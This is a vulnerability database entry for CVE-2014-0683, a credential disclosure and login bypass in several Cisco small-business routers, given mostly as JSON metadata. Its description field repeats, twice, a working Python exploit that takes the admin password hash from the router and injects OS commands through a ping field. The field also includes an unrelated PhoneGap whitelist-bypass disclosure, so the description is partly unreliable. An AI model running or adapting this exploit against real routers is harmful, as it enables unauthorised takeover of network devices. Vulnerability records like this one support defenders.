var-201403-0204
Vulnerability from variot
The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits may lead to other attacks. This issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2
Cisco RV110W Password Disclosure and OS Command Execute.
Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
Date: 2018-08
Exploit Author: RySh
Vendor Homepage: https://www.cisco.com/
Version: 1.1.0.9
Tested on: RV110W 1.1.0.9
CVE : CVE-2014-0683, CVE-2015-6396
import os import sys import re import urllib import urllib2 import getopt import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Usage: ./{script_name} 192.168.1.1 443 "reboot"
if name == "main": IP = argv[1] PORT = argv[2] CMD = argv[3]
# Get session key, Just access index page.
url = 'https://' + IP + ':' + PORT + '/'
req = urllib2.Request(url)
result = urllib2.urlopen(req)
res = result.read()
# parse 'admin_pwd'! -- Get credits
admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
# Get session_id by POST
req2 = urllib2.Request(url + "login.cgi")
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "0",
"change_action": "",
"enc": "1",
"user": admin_user,
"pwd": admin_pwd,
"sel_lang": "EN"
}
r = urllib2.urlopen(req2, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
# Execute your commands via diagnose command parameter, default command is `reboot`
req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req3.add_header('Origin', url)
req3.add_header('Upgrade-Insecure-Requests', 1)
req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
req3.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req3.add_header('Referer', url)
req3.add_header('Accept-Encoding', 'gzip, deflate')
req3.add_header('Accept-Language', 'en-US,en;q=0.9')
req3.add_header('Cookie', 'SessionID=')
data_cmd = {"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"gui_action": "",
"traceroute_ip": "",
"commit": "1",
"ping_times": "3 |" + CMD + "|",
"ping_size": "64",
"wait_time": "4",
"ping_ip": "127.0.0.1",
"lookup_name": ""
}
r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
. The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap.
Dear PhoneGap contributors,
PhoneGap\x92s domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf.
-
Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGap\x92s internal JavaScript interfaces to the Java objects and access native resources: for example, by calling execute = cordova.require('cordova/exec'); var opts = cordova.require ('cordova/plugin/ ContactFindOptions' ); and directly operating on these objects.
-
A malicious script running in an iframe can dynamically choose any of PhoneGap\x92s vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack.
-
PhoneGap\x92s whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression: this.whiteList.add(Pattern.compile("\x88https?://(.*\.)?" + origin));
For example, if foo.com is whitelisted, foo.com.evil.com will pass the check.
-
PhoneGap\x92s domain whitelisting on Android (API 11 or highler) and iOS does not adhere to the same-origin policy. Third-party scripts included using tags are blocked unless their source domain is whitelisted, even though these scripts execute in the origin of the hosting page, not their source origin.
-
Instead of just blocking access to bridges from non-whitelisted domains, PhoneGap completely blocks these domains from being loaded in the browser. This prevents ad-supported apps from displaying third-party ads and destroys the look-and-feel of many Web pages.
We have a proof-of-concept implementation (a 400-line patch for PhoneGap 2.9.0 on Android) called NoFrak [https://github.com/georgiev-martin/NoFrak] which fixes these vulnerabilities. NoFrak does not allow Web content from non-whitelisted domains to access native resources but still displays it correctly in the browser. If you are interested in discussing how to merge NoFrak or some parts of NoFrak to PhoneGap\x92s main branch, please let us know.
Thanks,
Martin, Suman, and Vitaly
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201403-0204",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv215w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.5"
},
{
"model": "rv110w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.9"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "cvr100w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.1.19"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "cvr100w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "cvr100w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "cvr100w wireless-n vpn router",
"scope": "lte",
"trust": 0.8,
"vendor": "cisco",
"version": "1.0.1.19"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lte",
"trust": 0.8,
"vendor": "cisco",
"version": "1.2.0.9"
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "lte",
"trust": 0.8,
"vendor": "cisco",
"version": "1.1.0.5"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.2.0.9"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.1.0.5"
},
{
"model": "cvr100w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.1.19"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.2.0.9"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-132"
},
{
"db": "NVD",
"id": "CVE-2014-0683"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:cisco:cvr100w",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:cvr100w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:cisco:rv110w",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:cisco:rv215w",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Gustavo Javier Speranza",
"sources": [
{
"db": "BID",
"id": "65988"
}
],
"trust": 0.3
},
"cve": "CVE-2014-0683",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-0683",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01575",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-68176",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-0683",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-0683",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2014-01575",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201403-132",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-68176",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"db": "VULHUB",
"id": "VHN-68176"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-132"
},
{
"db": "NVD",
"id": "CVE-2014-0683"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. \nAn attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits may lead to other attacks. \nThis issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2\n\n#####\n## Cisco RV110W Password Disclosure and OS Command Execute. \n### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)\n\n# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute\n# Date: 2018-08\n# Exploit Author: RySh\n# Vendor Homepage: https://www.cisco.com/\n# Version: 1.1.0.9\n# Tested on: RV110W 1.1.0.9\n# CVE : CVE-2014-0683, CVE-2015-6396\n\nimport os\nimport sys\nimport re\nimport urllib\nimport urllib2\nimport getopt\nimport json\n\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n###\n# Usage: ./{script_name} 192.168.1.1 443 \"reboot\"\n###\n\nif __name__ == \"__main__\":\n IP = argv[1]\n PORT = argv[2]\n CMD = argv[3]\n \n # Get session key, Just access index page. \n url = \u0027https://\u0027 + IP + \u0027:\u0027 + PORT + \u0027/\u0027\n req = urllib2.Request(url)\n result = urllib2.urlopen(req)\n res = result.read()\n \n # parse \u0027admin_pwd\u0027! -- Get credits\n admin_user = re.search(r\u0027.*(.*admin_name=\\\")(.*)\\\"\u0027, res).group().split(\"\\\"\")[1]\n admin_pwd = re.search(r\u0027.*(.*admin_pwd=\\\")(.{32})\u0027, res).group()[-32:]\n print \"Get Cred. Username = \" + admin_user + \", PassHash = \" + admin_pwd\n\n # Get session_id by POST\n req2 = urllib2.Request(url + \"login.cgi\")\n req2.add_header(\u0027Origin\u0027, url)\n req2.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n req2.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n req2.add_header(\u0027User-Agent\u0027,\n \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n req2.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n req2.add_header(\u0027Referer\u0027, url)\n req2.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n req2.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n req2.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n data = {\"submit_button\": \"login\",\n \"submit_type\": \"\",\n \"gui_action\": \"\",\n \"wait_time\": \"0\",\n \"change_action\": \"\",\n \"enc\": \"1\",\n \"user\": admin_user,\n \"pwd\": admin_pwd,\n \"sel_lang\": \"EN\"\n }\n r = urllib2.urlopen(req2, urllib.urlencode(data))\n resp = r.read()\n login_st = re.search(r\u0027.*login_st=\\d;\u0027, resp).group().split(\"=\")[1]\n session_id = re.search(r\u0027.*session_id.*\\\";\u0027, resp).group().split(\"\\\"\")[1]\n\n # Execute your commands via diagnose command parameter, default command is `reboot`\n req3 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\n req3.add_header(\u0027Origin\u0027, url)\n req3.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n req3.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n req3.add_header(\u0027User-Agent\u0027,\n \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n req3.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n req3.add_header(\u0027Referer\u0027, url)\n req3.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n req3.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n req3.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n data_cmd = {\"submit_button\": \"Diagnostics\",\n \"change_action\": \"gozila_cgi\",\n \"submit_type\": \"start_ping\",\n \"gui_action\": \"\",\n \"traceroute_ip\": \"\",\n \"commit\": \"1\",\n \"ping_times\": \"3 |\" + CMD + \"|\",\n \"ping_size\": \"64\",\n \"wait_time\": \"4\",\n \"ping_ip\": \"127.0.0.1\",\n \"lookup_name\": \"\"\n }\n r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))\n \n\n. The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. \nAs there has been no response, we are re-posting it here to alert the general public \nof the inherent vulnerabilities in Apache Cordova/PhoneGap. \n\n##############################################################################################\nDear PhoneGap contributors,\n\n\nPhoneGap\\x92s domain whitelisting for accessing native resources is\nbroken and can be bypassed. These vulnerabilities can be exploited by\nany third-party domain loaded inside an iframe (e.g., malicious ad\nscripts). Below, we give a brief summary of the vulnerabilities. You\ncan find more details in the paper \u003chttp://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf\u003e. \n\n\n1. Domain whitelisting on Android (before API 11) and Windows Phone 7\nand 8 relies on the URL interception call that does not intercept\niframe and XMLHttpRequest URLs. Consequently, it does not restrict\nwhich domains can be loaded in iframes. Any script inside an iframe\ncan directly use PhoneGap\\x92s internal JavaScript interfaces to the Java\nobjects and access native resources: for example, by calling execute =\ncordova.require(\u0027cordova/exec\u0027); var opts = cordova.require\n(\u0027cordova/plugin/ ContactFindOptions\u0027 ); and directly operating on\nthese objects. \n\n\n2. A malicious script running in an iframe can dynamically choose any\nof PhoneGap\\x92s vulnerable bridge mechanisms at runtime (e.g. \naddJavascriptInterface or loadUrl on Android) and use it to bypass the\ndomain whitelist. We call this the chosen-bridge attack. \n\n\n3. PhoneGap\\x92s whitelisting check on Android is incorrect - it misses\nan anchor at the end of the regular expression:\nthis.whiteList.add(Pattern.compile(\"\\x88https?://(.*\\\\.)?\" + origin));\n\nFor example, if foo.com is whitelisted, foo.com.evil.com will pass the check. \n\n4. PhoneGap\\x92s domain whitelisting on Android (API 11 or highler) and\niOS does not adhere to the same-origin policy. Third-party scripts\nincluded using \u003cscript\u003e tags are blocked unless their source domain is\nwhitelisted, even though these scripts execute in the origin of the\nhosting page, not their source origin. \n\n\n5. Instead of just blocking access to bridges from non-whitelisted\ndomains, PhoneGap completely blocks these domains from being loaded in\nthe browser. This prevents ad-supported apps from displaying\nthird-party ads and destroys the look-and-feel of many Web pages. \n\n\nWe have a proof-of-concept implementation (a 400-line patch for\nPhoneGap 2.9.0 on Android) called NoFrak\n[https://github.com/georgiev-martin/NoFrak] which fixes these\nvulnerabilities. NoFrak does not allow Web content from\nnon-whitelisted domains to access native resources but still displays\nit correctly in the browser. If you are interested in discussing how\nto merge NoFrak or some parts of NoFrak to PhoneGap\\x92s main branch,\nplease let us know. \n\n\nThanks,\n\nMartin, Suman, and Vitaly\n\n##############################################################################################\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0683"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"db": "BID",
"id": "65988"
},
{
"db": "VULHUB",
"id": "VHN-68176"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "PACKETSTORM",
"id": "124954"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-68176",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-68176"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-0683",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "45986",
"trust": 1.1
},
{
"db": "BID",
"id": "65988",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "124954",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201403-132",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-01575",
"trust": 0.6
},
{
"db": "CISCO",
"id": "20140305 CISCO SMALL BUSINESS ROUTER PASSWORD DISCLOSURE VULNERABILITY",
"trust": 0.6
},
{
"db": "SECUNIA",
"id": "57119",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "150781",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "125567",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-68176",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"db": "VULHUB",
"id": "VHN-68176"
},
{
"db": "BID",
"id": "65988"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "PACKETSTORM",
"id": "124954"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-132"
},
{
"db": "NVD",
"id": "CVE-2014-0683"
}
]
},
"id": "VAR-201403-0204",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"db": "VULHUB",
"id": "VHN-68176"
}
],
"trust": 1.32380537
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01575"
}
]
},
"last_update_date": "2024-11-23T21:55:26.947000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20140305-rpd",
"trust": 0.8,
"url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
},
{
"title": "33019",
"trust": 0.8,
"url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=33019"
},
{
"title": "cisco-sa-20140305-rpd",
"trust": 0.8,
"url": "http://www.cisco.com/cisco/web/support/JP/112/1122/1122121_cisco-sa-20140305-rpd-j.html"
},
{
"title": "Multiple Cisco RV Series Routers Verify Patches That Surpass Password Disclosure Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/44175"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-68176"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"db": "NVD",
"id": "CVE-2014-0683"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140305-rpd"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/45986/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0683"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0683"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/531356"
},
{
"trust": 0.6,
"url": "http://www.internetsociety.org/ndss2014/programme#session3"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2014/jan/96"
},
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/124954/apachecordovaphonegap-bypass.txt"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/57119"
},
{
"trust": 0.3,
"url": "www.cisco.com"
},
{
"trust": 0.1,
"url": "https://\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0683"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6396"
},
{
"trust": 0.1,
"url": "https://www.cisco.com/"
},
{
"trust": 0.1,
"url": "http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf\u003e."
},
{
"trust": 0.1,
"url": "https://github.com/georgiev-martin/nofrak]"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"db": "VULHUB",
"id": "VHN-68176"
},
{
"db": "BID",
"id": "65988"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "PACKETSTORM",
"id": "124954"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-132"
},
{
"db": "NVD",
"id": "CVE-2014-0683"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01575"
},
{
"db": "VULHUB",
"id": "VHN-68176"
},
{
"db": "BID",
"id": "65988"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001579"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "PACKETSTORM",
"id": "124954"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-132"
},
{
"db": "NVD",
"id": "CVE-2014-0683"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-12T00:00:00",
"db": "CNVD",
